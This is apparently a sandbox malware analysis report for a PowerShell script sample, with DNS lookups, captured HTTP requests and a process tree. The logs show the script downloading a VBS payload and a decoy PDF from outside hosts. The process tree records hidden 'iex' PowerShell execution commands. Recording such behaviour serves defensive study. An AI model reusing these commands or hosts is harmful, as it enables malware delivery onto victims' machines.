                                                                                        Dec 19, 2024 12:47:58.826335907 CET1.1.1.1192.168.2.60xa593No error (0)astenterprises.com.pk107.161.23.150A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:02.510039091 CET1.1.1.1192.168.2.60x78ccNo error (0)www.bluemaxxlaser.com203.175.174.69A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:13.068824053 CET1.1.1.1192.168.2.60xcf6cNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:28.239095926 CET1.1.1.1192.168.2.60xe41bNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 19, 2024 12:48:52.317977905 CET1.1.1.1192.168.2.60xf0d2No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.211.18A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.99A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.101A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.98A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.209.66A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:28.409857988 CET1.1.1.1192.168.2.60xee2No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.58.100A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:52.504728079 CET1.1.1.1192.168.2.60x3c7bNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                        Dec 19, 2024 12:49:52.504728079 CET1.1.1.1192.168.2.60x3c7bNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false

                                                                                        HTTP Request Dependency Graph

                                                                                        • www.astenterprises.com.pk
                                                                                        • www.bluemaxxlaser.com

                                                                                        HTTP Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649721203.175.174.69803924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Dec 19, 2024 12:48:02.635452986 CET80OUTGET /ms/ms.vbs HTTP/1.1
                                                                                        Host: www.bluemaxxlaser.com
                                                                                        Connection: Keep-Alive
                                                                                        Dec 19, 2024 12:48:04.165550947 CET516INHTTP/1.1 404 Not Found
                                                                                        Date: Thu, 19 Dec 2024 11:48:03 GMT
                                                                                        Server: Apache
                                                                                        Content-Length: 315
                                                                                        Keep-Alive: timeout=5, max=100
                                                                                        Connection: Keep-Alive
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                        HTTPS Proxied Packets

                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        0192.168.2.649710107.161.23.1504433924C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-19 11:48:00 UTC127OUTGET /ms/List%20of%20required%20items%20and%20services.pdf HTTP/1.1
                                                                                        Host: www.astenterprises.com.pk
                                                                                        Connection: Keep-Alive
                                                                                        2024-12-19 11:48:00 UTC217INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        content-type: application/pdf
                                                                                        last-modified: Sun, 28 Jan 2024 19:03:01 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 871324
                                                                                        date: Thu, 19 Dec 2024 11:48:00 GMT
                                                                                        server: LiteSpeed
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: 25 50 44 46 2d 31 2e 37 0d 25 e2 e3 cf d3 0d 0a 31 32 39 20 30 20 6f 62 6a 0d 3c 3c 2f 4c 69 6e 65 61 72 69 7a 65 64 20 31 2f 4c 20 36 35 33 32 34 38 2f 4f 20 31 33 31 2f 45 20 38 36 34 32 33 2f 4e 20 35 2f 54 20 36 35 32 37 37 30 2f 48 20 5b 20 34 39 37 20 32 37 33 5d 3e 3e 0d 65 6e 64 6f 62 6a 0d 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 31 34 33 20 30 20 6f 62 6a 0d 3c 3c 2f 44 65 63 6f 64 65 50 61 72 6d 73 3c 3c 2f 43 6f 6c 75 6d 6e 73 20 35 2f 50 72 65 64 69 63 74 6f 72 20 31 32 3e 3e 2f 46 69 6c 74 65 72 2f 46 6c 61 74 65 44 65 63 6f 64 65 2f 49 44 5b 3c 45 33 39 35 37 36 43 34 37 35 41 42 45 43 34 33 41 31 38 37 42 39 44 37 38 30 43 34 37 35 37 44 3e 3c 36 34 31 43 41 32 38 37 30 33 43 34 42 31 34 34 38 38 36 46 33 34 32 30 32 33 42 33 34 35
                                                                                        Data Ascii: %PDF-1.7%129 0 obj<</Linearized 1/L 653248/O 131/E 86423/N 5/T 652770/H [ 497 273]>>endobj 143 0 obj<</DecodeParms<</Columns 5/Predictor 12>>/Filter/FlateDecode/ID[<E39576C475ABEC43A187B9D780C4757D><641CA28703C4B144886F342023B345
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: 4b 4b 4b f4 b8 e9 cf 0b a9 9e 76 d3 14 23 28 9c 68 17 25 44 45 32 9b e4 30 63 de da 74 55 51 91 17 0f 23 b9 74 42 79 99 8f 15 a5 ab 6a 2d 56 56 3a 41 91 9b da fa 0f ac 3d b1 66 fa f2 fe 83 1f ae 7f f5 f4 91 8d 1b 8f 1c 79 71 63 43 8e f6 13 91 4c 3d ba a0 bb 30 72 b9 50 28 fc b1 6b ef 29 f2 46 e1 b5 4f 6f 93 56 b2 fc d6 f7 7f 8a 68 bc 82 40 bb 8f 18 d3 88 9b 23 ac 5b 1b 5f f9 98 a0 8d 65 0b c6 04 6d 34 17 e3 49 b1 4b 9a 05 db b4 aa db c4 4d 74 17 dd e7 12 8f 8a 44 05 59 a2 82 2a 11 83 92 4b 9a 93 5d 8d ef 13 90 04 7a cd 8f 5c 75 ce 6c 14 6e da 96 03 d7 98 03 57 b7 03 57 cc 96 1d e6 60 1c 43 9c 83 be 88 21 d9 a6 a7 5a e2 b6 dc dc 96 44 12 92 2d 51 29 ac 9f 21 19 b2 05 46 a9 ba 6a 74 47 9c 0b 07 a3 b5 30 cb 0f c6 7a be 33 90 c3 d2 e3 5c 51 1b 63 53 65 5b 92
                                                                                        Data Ascii: KKKv#(h%DE20ctUQ#tByj-VV:A=fyqcCL=0rP(k)FOoVh@#[_em4IKMtDY*K]z\ulnWW`C!ZD-Q)!FjtG0z3\QcSe[
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: ed 2b 5d eb ed eb 5d 1c 2a ad 66 a8 50 9d 10 15 d2 5d 0e 75 89 22 17 a4 6d 26 47 51 ca 35 42 88 c3 b3 09 47 4c 80 b6 92 8c b5 95 6c 19 f8 f6 d9 f7 91 fa dc ad 57 af 4d dc fe d5 c9 be 57 4e 0e ee ea 3b c9 fa 50 6a f7 f6 89 bf 8d 5f bc f5 0d 14 41 ee 0b e7 2f fc f9 ec f9 73 e4 27 f5 4d 74 70 75 84 2a 2f 13 41 57 a8 0a f5 4a f8 01 fc 45 dc 8a b9 5c f4 78 94 ad 8d 4e 93 e2 35 99 40 a6 66 61 cd e6 68 7f d4 d9 1c 6c 36 96 05 97 19 ab 9d 6b a5 62 b0 68 74 3a 37 49 1d b8 3b b8 c9 18 89 5e f2 5f d5 ae 86 2e 45 6e f8 6f 44 ae 47 27 a3 6a 9c 6b c4 8d 81 59 5c 33 7e 98 5b 86 d7 e0 bf 8b b7 6a 26 b0 a8 c8 36 35 1c 06 a3 55 c3 b2 c8 c8 7a 15 50 ba 05 28 7d 0a a8 70 41 4f 8c 0a 08 0b 79 a1 5d d8 29 70 51 8a 55 94 22 26 0c 4f 8e e5 45 80 4b d0 2a 9f c1 70 69 f1 31 e5 4b
                                                                                        Data Ascii: +]]*fP]u"m&GQ5BGLlWMWN;Pj_A/s'Mtpu*/AWJE\xN5@fahl6kbht:7I;^_.EnoDG'jkY\3~[j&65UzP(}pAOy])pQU"&OEK*pi1K
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: f0 0a e0 02 58 65 b0 11 40 67 2b c0 87 c0 35 fc 13 79 8d 58 c0 10 a0 b2 bf 79 e8 c6 67 1f 79 46 9e e7 3a d8 5f d9 fb 64 23 66 fc 2f ec 03 c9 1f 62 57 13 fc 67 f6 ae e4 2b e0 38 78 85 bd e7 c5 39 c9 b5 22 4f 50 27 22 4e 29 e0 34 f2 f7 b1 77 e6 ba a3 bc 9e 6b c7 f1 1c 8f 19 36 0d 64 81 41 60 0c 98 05 5a d8 25 d6 e5 3d c5 a3 68 64 89 ac e0 fd e7 cc 23 5f 4b 7e 8d bc aa 12 eb 19 6e 19 7b b1 00 75 61 8c dd 8f c2 83 39 a7 9f 33 98 65 9c f9 23 8a c2 18 a7 7f 0b 4f 18 e3 97 bf 81 27 8c f1 b3 13 f0 84 31 9e 3b 06 4f 18 e3 a9 67 e0 09 63 8c 8e c1 13 c6 18 1c 81 07 e3 b3 97 df ea fe 31 cf 0c 3e 4b f5 5c 98 cd 60 96 66 30 4b 33 98 a5 19 12 64 33 e2 47 6e 07 c5 d8 fe e4 f5 f4 60 c6 ce 5a e6 e6 1e ee 2c 52 e7 6d ea ec a7 ce ab d4 99 a4 ce 71 ea 9c a0 ce 1e ea 1c a2 8e
                                                                                        Data Ascii: Xe@g+5yXygyF:_d#f/bWg+8x9"OP'"N)4wk6dA`Z%=hd#_K~n{ua93e#O'1;Ogc1>K\`f0K3d3Gn`Z,Rmq
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: e6 09 e6 76 33 e7 20 39 5e d7 78 5c 72 bd 06 f7 03 59 e9 3e 2d 95 8a b9 83 39 2b 4d 32 5a 61 cf 2e f3 cb 65 b2 fb 90 ac 63 6f ef a1 bc c6 ed 21 4b fd 91 c4 9b 86 33 5f 20 23 19 ff 3c c6 9a 44 ce d9 ac df cc 33 8c 73 34 a2 45 46 69 ce e6 3f 28 cd de 50 6c 32 6a e3 d5 61 e7 b7 73 2e 74 1f 6e 92 02 3f 87 75 3e ab 77 4d 78 18 bd 03 a8 d6 fd 61 af b3 fc 7b d8 7b a4 de 55 9c d7 a9 e6 59 d6 e5 b0 3d 47 55 71 1d 1d 72 4c 4b 78 9a f1 b2 e8 9b 85 14 fa ab cc e1 7f 39 cc b7 27 ef f3 fd 27 a5 80 3b b0 98 fb 6c 8a 5f c2 7a ed 95 6e f6 ae 65 fd fd e1 32 d0 ea 73 44 1a 33 72 39 2b bf 97 89 de 11 fa 6f 0a 5b bd de d8 60 0f b9 87 b6 33 19 6b 86 de 8b cc ab 21 73 b6 38 e6 a3 f0 44 e0 c9 4d c6 c8 f5 fc c3 f3 7e 9c d4 55 63 44 7c 64 a1 5b 2c 23 9d 33 52 18 4c a7 ff e7 ac 41
                                                                                        Data Ascii: v3 9^x\rY>-9+M2Za.eco!K3_ #<D3s4EFi?(Pl2jas.tn?u>wMxa{{UY=GUqrLKx9'';l_zne2sD3r9+o[`3k!s8DM~UcD|d[,#3RLA
                                                                                        2024-12-19 11:48:00 UTC16384INData Raw: 0c 0c 0b 0a 0b 0b 0d 0e 12 10 0d 0e 11 0e 0b 0b 10 16 10 11 13 14 15 15 15 0c 0f 17 18 16 14 18 12 14 15 14 ff db 00 43 01 03 04 04 05 04 05 09 05 05 09 14 0d 0b 0d 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 14 ff c0 00 11 08 00 3f 00 c0 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66
                                                                                        Data Ascii: C?"}!1AQa"q2#BR$3br%&'()*456789:CDEFGHIJSTUVWXYZcdef
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: 42 63 f6 91 ac 1c 27 a7 50 cf 3e 4d fa d1 56 75 d0 ba c5 64 81 1a e6 4c e6 58 0c d5 26 8d 98 fa 33 16 57 24 7e ce 0d 4d b4 4e e0 f1 9d a4 83 d6 ad f8 85 85 a3 92 91 35 88 bd 03 2b 42 68 57 83 ca 8b eb 0a 26 10 84 26 17 0f 24 e1 b0 a4 2a f0 34 91 e7 9e c9 ab bc 37 82 b3 3c e6 68 87 ab e0 87 8c 95 38 94 3f 89 f6 74 69 2e 63 10 88 29 1a de d4 82 08 7f 0f d5 a4 1b 8d 61 79 c7 6f 9d e0 37 4a 89 38 17 e9 e4 95 dd 0d 7d 4f b3 30 56 d1 0f 1c 57 76 69 e3 4b 9b 0b d3 f3 e3 1a d9 e4 26 c2 70 53 39 67 76 0d 9f 1c f4 20 16 3a db 45 1d c7 b7 5c d1 9f 30 3d 72 3f aa ba 3c 22 fd 70 1b 45 03 b3 43 32 bf d8 82 1f e4 4f 1d 0f 11 35 f9 12 53 6d 59 4a 7b 27 f0 ef 43 32 e2 85 41 65 c5 a3 51 82 27 2e 9e 0e 45 46 7d 6b 32 7c 43 4a 16 e0 ee b0 58 c2 df 44 9e b6 f4 11 a9 53 55 b4
                                                                                        Data Ascii: Bc'P>MVudLX&3W$~MN5+BhW&&$*47<h8?ti.c)ayo7J8}O0VWviK&pS9gv :E\0=r?<"pEC2O5SmYJ{'C2AeQ'.EF}k2|CJXDSU
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: 74 f9 ed f0 78 28 61 e2 0c 41 23 be 47 c9 59 95 29 28 4a 96 a2 02 52 09 24 ec 00 dc c5 44 80 24 ab 2e a9 da ee 77 e0 9a 05 5c 51 a7 2a 92 c8 9b b9 49 6d 4e a7 8a f6 e9 c5 d7 a7 b6 18 47 ea ce ed 40 04 cf 01 f3 af 70 ac 7e 19 60 04 e7 fb fc 28 5c f7 6a 0c bd 93 ae 4b d1 0d 4e 58 cd 4c 14 a5 08 0f 37 7b ab 41 a5 ef bf 9e dc af 16 60 b0 e3 3d cc 6d 0b 4d 78 5b f6 55 58 87 e9 b5 ae 24 43 a0 f2 93 9f 94 3c 96 c3 d2 aa 72 d5 79 26 67 a5 16 16 cb e8 4a d2 52 6e 2c a1 71 af 3b f2 f6 c1 ec 38 6e 2d 22 14 58 f0 f1 23 fd e5 9c 2c 8c 41 4d 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 41 12 08 90 44 82 24 11 20 89 04 48 22 fc 3b 1b 6f 63 68 e3 ac 79 1f 65 d1 71 36 91 2b c0 4f f8 ab 4a e2 aa 9c d4 9c 85 04 4d ad 6f 39 c0 13 2e 16 4e a7 84 7e e7 98 f1 f5 eb 18
                                                                                        Data Ascii: tx(aA#GY)(JR$D$.w\Q*ImNG@p~`(\jKNXL7{A`=mMx[UX$C<ry&gJRn,q;8n-"X#,AM H"AD$ H"AD$ H";ochyeq6+OJMo9.N~
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: e4 47 fa 93 f1 82 27 78 df fe 44 7f a9 3f 18 22 fa 04 1d 41 04 75 06 f0 45 fb 04 48 22 41 12 08 90 44 82 24 11 20 89 04 51 dc 55 50 99 a6 50 a7 e7 25 10 5c 7d 96 1c 5b 69 4e a7 89 29 24 73 07 d9 ee de 08 bc 08 cf be dc 5d a0 f0 56 33 a8 d2 a8 18 6e a5 31 26 cc cb a8 6d 6d b0 f2 92 52 95 90 08 e1 04 6d ee 1e b8 22 a2 7f c4 57 b5 07 f4 9d 57 ea d3 1f 82 08 9f e2 2b da 83 fa 4e ab f5 69 8f c1 04 4f f1 15 ed 41 fd 27 55 fa b4 c7 e0 82 27 f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 16 5a 8b ff 00 10 4e d3 b5 39 e6 a5 1c c2 d5 54 25 c5 24 15 7c 9e 60 68 4d b7 29 02 08 a5 d8 bb b7 0f 69 7c 3e d3 2f cb e1 ba a3 a5 c4 05 10 18 7c f2 3a 58 03 b5 fa 0f 3e a4 55 df f8 8a f6 a0 fe 93 aa fd 5a 63 f0 41 13 fc 45 7b 50 7f 49 d5 7e ad 31 f8 20 89 fe 22 bd a8 3f a4 ea bf 56 98 fc
                                                                                        Data Ascii: G'xD?"AuEH"AD$ QUPP%\}[iN)$s]V3n1&mmRm"WW+NiOA'U'ZcAZN9T%$|`hM)i|>/|:X>UZcAE{PI~1 "?V
                                                                                        2024-12-19 11:48:01 UTC16384INData Raw: 65 4a 6b 65 99 59 69 a6 d1 2e 92 09 42 56 9d 76 36 de de ee 91 3f a8 5c e0 5f 5b 77 e3 3c 3f c5 d2 61 a4 01 53 f1 61 dd 5d 12 d9 1d 42 6b 0c 37 40 71 c6 94 df 77 c2 a0 a5 a4 83 70 01 dc f3 3e be 57 b4 31 5f be e0 40 10 00 be 7d bd b9 8a 65 3d 97 15 d8 04 b8 5c 83 c0 88 f9 a2 a4 2b 1d 8b 70 55 46 a6 cd 41 29 97 42 d0 b0 b5 5b 80 5f 5b f5 d6 e0 ef 6f 2d 74 8e 37 10 b5 e5 c3 3c b9 5b ad bc 99 96 36 33 b1 a6 69 37 fc a9 0a 7b 33 ca 4a 38 c3 12 33 68 6e 4d 01 21 68 4a 85 ac 39 1b 5b 71 ef bd b4 b4 0e 21 79 fb e4 89 91 a0 a1 1c ce 53 6f 85 43 bf ac 34 41 f2 de 4d 55 e1 86 b2 e5 9c 31 26 d4 b4 84 cb 69 03 84 2c 85 01 73 a7 4d 2d e0 7a f2 8e e2 62 17 d2 c3 f7 3f ee aa b0 cb 9a 6f 47 0d 3c 8c a4 4d 57 1e 62 e5 7c 8e 39 a1 2a 4a 69 e6 94 e7 00 40 5f 12 7f 7a da eb
                                                                                        Data Ascii: eJkeYi.BVv6?\_[w<?aSa]Bk7@qwp>W1_@}e=\+pUFA)B[_[o-t7<[63i7{3J83hnM!hJ9[q!ySoC4AMU1&i,sM-zb?oG<MWb|9*Ji@_z


                                                                                        Statistics

                                                                                        CPU Usage

                                                                                        Click to jump to process

                                                                                        Memory Usage

                                                                                        Click to jump to process

                                                                                        High Level Behavior Distribution

                                                                                        Click to dive into process behavior distribution

                                                                                        Behavior

                                                                                        Click to jump to process

                                                                                        System Behavior

                                                                                        General

                                                                                        Target ID:0
                                                                                        Start time:06:47:47
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\1M1QoJF40r.ps1"
                                                                                        Imagebase:0x7ff6e3d50000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:1
                                                                                        Start time:06:47:47
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff66e660000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:3
                                                                                        Start time:06:47:50
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\uipw9v.vbs'"
                                                                                        Imagebase:0x7ff6e3d50000
                                                                                        File size:452'608 bytes
                                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        General

                                                                                        Target ID:5
                                                                                        Start time:06:48:00
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\List of Required items and services.pdf"
                                                                                        Imagebase:0x7ff651090000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:6
                                                                                        Start time:06:48:02
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff70df30000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:7
                                                                                        Start time:06:48:02
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7403e0000
                                                                                        File size:55'320 bytes
                                                                                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        General

                                                                                        Target ID:8
                                                                                        Start time:06:48:02
                                                                                        Start date:19/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1524,i,4216622319176972056,6080722429787729294,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff70df30000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Disassembly

                                                                                        Reset < >

                                                                                          Executed Functions

                                                                                          Function 00007FFD3496512E Relevance: 1.3, Strings: 1, Instructions: 57COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2427179770.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: A_H
                                                                                          • API String ID: 0-522415800
                                                                                          • Opcode ID: ee37bde4aca7319df0846c399230076561aeec93b7ab22d4b1295300fc2dbfcd
                                                                                          • Instruction ID: f46a2ddadef17c66d64f6b20b5b1e685df899800a57edae70e2d9c116f47fb4e
                                                                                          • Opcode Fuzzy Hash: ee37bde4aca7319df0846c399230076561aeec93b7ab22d4b1295300fc2dbfcd
                                                                                          • Instruction Fuzzy Hash: 7D11E371F0D6894FEB95DA5854A45A87B91EF56334F0400BEC94CC7193DA2DA804C721
                                                                                          Function 00007FFD34962042 Relevance: .4, Instructions: 377COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2427179770.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 87582d2d4497c7ad4cd7b393a42df3ccfcb9083ec09fc7360b3b07182520d14e
                                                                                          • Instruction ID: 9c67e1364092d4ca5566c67037c0d3996c03c29270dc973eb44c06ea996e5660
                                                                                          • Opcode Fuzzy Hash: 87582d2d4497c7ad4cd7b393a42df3ccfcb9083ec09fc7360b3b07182520d14e
                                                                                          • Instruction Fuzzy Hash: D2B14622B0DB890FE75AA72858A55B53BE1EF57230F0801EFD589CB1D7D91CA805D362
                                                                                          Function 00007FFD34962370 Relevance: .1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2427179770.00007FFD34960000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34960000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffd34960000_powershell.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 2c91f3193baf763e4d9627c7f3c606d3df8d22d6a27bd99b9abfa61393d57ea1
